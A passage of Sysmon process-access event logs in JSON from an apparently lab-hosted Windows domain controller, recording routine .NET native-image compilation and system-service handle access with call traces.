08:05:22.413","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-2242-5F25-0000-001099230C00}","TargetProcessId":"3900","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:22","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7137,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:22.413\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1148\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2242-5F25-0000-001099230C00}\r\nTargetProcessId: 3900\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:22.413","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"1148","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2242-5F25-0000-001099230C00}","TargetProcessId":"3900","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:05:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:22","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7138,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:22.429\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-2242-5F25-0000-001099230C00}\r\nTargetProcessId: 3900\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:22.429","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-2242-5F25-0000-001099230C00}","TargetProcessId":"3900","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:22","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7139,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:22.476\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-2242-5F25-0000-001071270C00}\r\nTargetProcessId: 2252\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:22.476","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-2242-5F25-0000-001071270C00}","TargetProcessId":"2252","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:22","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7140,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:22.476\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2242-5F25-0000-001071270C00}\r\nTargetProcessId: 2252\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:22.476","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2242-5F25-0000-001071270C00}","TargetProcessId":"2252","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:05:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:22","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7141,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:22.476\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-2242-5F25-0000-001071270C00}\r\nTargetProcessId: 2252\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:22.476","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-2242-5F25-0000-001071270C00}","TargetProcessId":"2252","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:22","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7142,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:22.554\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010D1A90000}\r\nSourceProcessId: 1004\r\nSourceThreadId: 4244\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-001044B90000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+ed71|c:\\windows\\system32\\rpcss.dll+ca3e|c:\\windows\\system32\\rpcss.dll+b157|c:\\windows\\system32\\rpcss.dll+7897|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:22.554","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010D1A90000}","SourceProcessId":"1004","SourceThreadId":"4244","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-001044B90000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+ed71|c:\\windows\\system32\\rpcss.dll+ca3e|c:\\windows\\system32\\rpcss.dll+b157|c:\\windows\\system32\\rpcss.dll+7897|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:22","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7143,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:22.648\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-2242-5F25-0000-00101F2B0C00}\r\nTargetProcessId: 4932\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:22.648","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-2242-5F25-0000-00101F2B0C00}","TargetProcessId":"4932","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:22","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7144,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:22.648\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1148\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2242-5F25-0000-00101F2B0C00}\r\nTargetProcessId: 4932\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 